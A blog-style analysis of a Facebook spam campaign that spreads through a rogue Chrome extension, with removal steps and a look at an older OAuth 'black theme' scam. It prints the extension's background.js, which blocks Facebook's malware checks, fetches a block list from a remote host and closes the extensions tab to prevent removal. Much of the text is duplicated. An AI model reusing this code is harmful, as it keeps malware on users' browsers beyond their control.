In the past I have seen several facebook spam campaigns...
The usual ones are the ones that offer to change your facebook theme or hack your friend's account... in both cases you either paste your oauth code which u get from facebook after you accept to share your information to the app they specify, etc.
But this new campaign is better..
Its was live for the last 5 days and you can see the number of people infected by it and online from their amung.us url.
[Which I found after analyzing their plugin as we will see later in this post]
http://whos.amung.us/stats/userlistx5/
So lets get into more details of how this spam campaign spread.
Prerequisites:
Nice landing pages, domains, silent plugin installers, plugins with some sweet javascript codes, and some more nice javascript code on their sites.
Step 1.
They bought installs to their plugin installers.
Step 2.
The plugins contacted their sites and then checked if user was logged into facebook.
Step 3.
The javascript spammed the user's friends with message like:
Then they saw the red arrow and clicked on the exe and ran it..
Now the important clue we get from this landing page is "Ana Sayfa"
Which is Turkish for "Home Page"
I am guessing the guys who made this page copied the Facebook bar codes straight out of facebook.
Hence they might be from Turkey.
So lets try to get more details about the plugin installer and the plugin.
Analysis of the exe by Virustotal:
Earlier [2 days ago] detections were: 7/53
Currently its: 22/53
[https://www.virustotal.com/en/file/db44cfb583e2b409d262e6d539106e4af8f33117a613983381b60cc0ee00e30d/analysis/1406476387/ ]
Now the exe installs a plugin..
Its name and other components are downloaded from the website the coder setup.
Hence the plugin after certain time intervals has a new name and new manifest file generated on the site.
In order to stop chrome from mass deleting a certain plugin.
Now this background.js has two important functions..
1. It calls the javascript code from ext/s.php that does the spamming of the friends:
These are the domain names of Antivirus companies, etc who might detect this plugin and alert the user..
And the last part is the chrome.tabs.onUpdated.addListener() function that stops the user from opening the
chrome://extensions tab.. so even if the user tried to delete the plugin he could not.. At least not from the browser..
So, for everyone who wants to know how to remove it..
You would have to manually go to %localappdata% then Google\Chrome\User Data\Default\Extensions and then delete the rogue plugin, or just delete all the plugins and then install the plugins you need from chrome store again..
Here is an image to help explain better..
And now...
A Blast from the Past..
Facebook Black Theme people are also back!
[I have a hunch that these guys might know each other as i have seen both of them use similar codes or they might have stolen codes from each other or something..]
Originally it was being spread from:
https://www.facebook.com/notes/facetoon/switch-to-black-facebook-click-on-below-image/1503844979832724
So its something i noticed when i found this..
On facebook pages you can create notes.. and insert images which are hyperlinked to sites!
So as soon as the users clicked on the images it redirected them to those old get facebook theme landing pages that has steps like allow this app.. copy paste your oauth code like and idiot..
Then it would find people from the user's friend list and go spam their wall with the message
"Hey <friend's name>, I am using this new facebook theme. Try it out now! go here: <link to the facebook page note> "
But as since the link being spammed was a facebook domain itself.. it took facebook almost a 24 hours before they began deleting those messages and finally closed the page itself.
Seems like these people are discovering interesting things..
And every time Facebook thinks they have seen enough of the spammers and have found all the ways to stop them using their spam detection bots..
These guys come back with new surprises and more firepower!
The usual ones are the ones that offer to change your facebook theme or hack your friend's account... in both cases you either paste your oauth code which u get from facebook after you accept to share your information to the app they specify, etc.
But this new campaign is better..
Its was live for the last 5 days and you can see the number of people infected by it and online from their amung.us url.
[Which I found after analyzing their plugin as we will see later in this post]
http://whos.amung.us/stats/userlistx5/
So lets get into more details of how this spam campaign spread.
Prerequisites:
Nice landing pages, domains, silent plugin installers, plugins with some sweet javascript codes, and some more nice javascript code on their sites.
Step 1.
They bought installs to their plugin installers.
Step 2.
The plugins contacted their sites and then checked if user was logged into facebook.
Step 3.
The javascript spammed the user's friends with message like:
The RED part is you friend's name; The Grey part is your friend's photo.
A fairly convincing photo.. On which people instantly clicked..
It redirected them to the landing pages which looks like:
Again fairly convincing for normal everyday facebook users..
Step 4.Then they saw the red arrow and clicked on the exe and ran it..
Now the important clue we get from this landing page is "Ana Sayfa"
Which is Turkish for "Home Page"
I am guessing the guys who made this page copied the Facebook bar codes straight out of facebook.
Hence they might be from Turkey.
So lets try to get more details about the plugin installer and the plugin.
Analysis of the exe by Virustotal:
Earlier [2 days ago] detections were: 7/53
Currently its: 22/53
[https://www.virustotal.com/en/file/db44cfb583e2b409d262e6d539106e4af8f33117a613983381b60cc0ee00e30d/analysis/1406476387/ ]
Now the exe installs a plugin..
Its name and other components are downloaded from the website the coder setup.
Hence the plugin after certain time intervals has a new name and new manifest file generated on the site.
In order to stop chrome from mass deleting a certain plugin.
The manifest.json file for the plugin:
The Preferences file for the plugin:
The background.js file thats injected by the plugin:
1. It calls the javascript code from ext/s.php that does the spamming of the friends:
from here we can clearly see the whos.amung.us that is being used to keep track of the campaing.
2. The background.js has some interesting code in the end..
chrome.webRequest.onBeforeRequest.addListener(
function (details) {
var url = details.url;
for (var i = 0; i < deep.length; i++) {
if (url.indexOf(deep[i]) > -1) {
return {
cancel: true
};
}
}
}, {
urls: ["<all_urls>"]
}, ["blocking"]
);
var deep = ["facebook.com/csp.php","facebook.com/checkpoint/malware/cr_ext_config"];
function trance() {
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4) {
try {
JSON.parse(xmlhttp.responseText).forEach(function (d) {
if (d.uri) {
deep.push(d.uri);
}
});
} catch (e) {}
}
};
xmlhttp.open("GET", "http://patronbayi.com/ext/get.js", true);
xmlhttp.send();
}
trance();
chrome.tabs.onUpdated.addListener(function(tabid,x,tab)
{if(tab.url=="chrome://chrome/extensions" ||
tab.url=="opera://extensions" ||
tab.url=="chrome://help/" ||
tab.url=="chrome://extensions/")
{
chrome.tabs.remove(tab.id);
}
});
Now what this firstly does is.. it gets a list of domains from ext/get.js..
And the last part is the chrome.tabs.onUpdated.addListener() function that stops the user from opening the
chrome://extensions tab.. so even if the user tried to delete the plugin he could not.. At least not from the browser..
So, for everyone who wants to know how to remove it..
You would have to manually go to %localappdata% then Google\Chrome\User Data\Default\Extensions and then delete the rogue plugin, or just delete all the plugins and then install the plugins you need from chrome store again..
Here is an image to help explain better..
And now...
A Blast from the Past..
Facebook Black Theme people are also back!
[I have a hunch that these guys might know each other as i have seen both of them use similar codes or they might have stolen codes from each other or something..]
Originally it was being spread from:
https://www.facebook.com/notes/facetoon/switch-to-black-facebook-click-on-below-image/1503844979832724
So its something i noticed when i found this..
On facebook pages you can create notes.. and insert images which are hyperlinked to sites!
So as soon as the users clicked on the images it redirected them to those old get facebook theme landing pages that has steps like allow this app.. copy paste your oauth code like and idiot..
Then it would find people from the user's friend list and go spam their wall with the message
"Hey <friend's name>, I am using this new facebook theme. Try it out now! go here: <link to the facebook page note> "
But as since the link being spammed was a facebook domain itself.. it took facebook almost a 24 hours before they began deleting those messages and finally closed the page itself.
Seems like these people are discovering interesting things..
And every time Facebook thinks they have seen enough of the spammers and have found all the ways to stop them using their spam detection bots..
These guys come back with new surprises and more firepower!
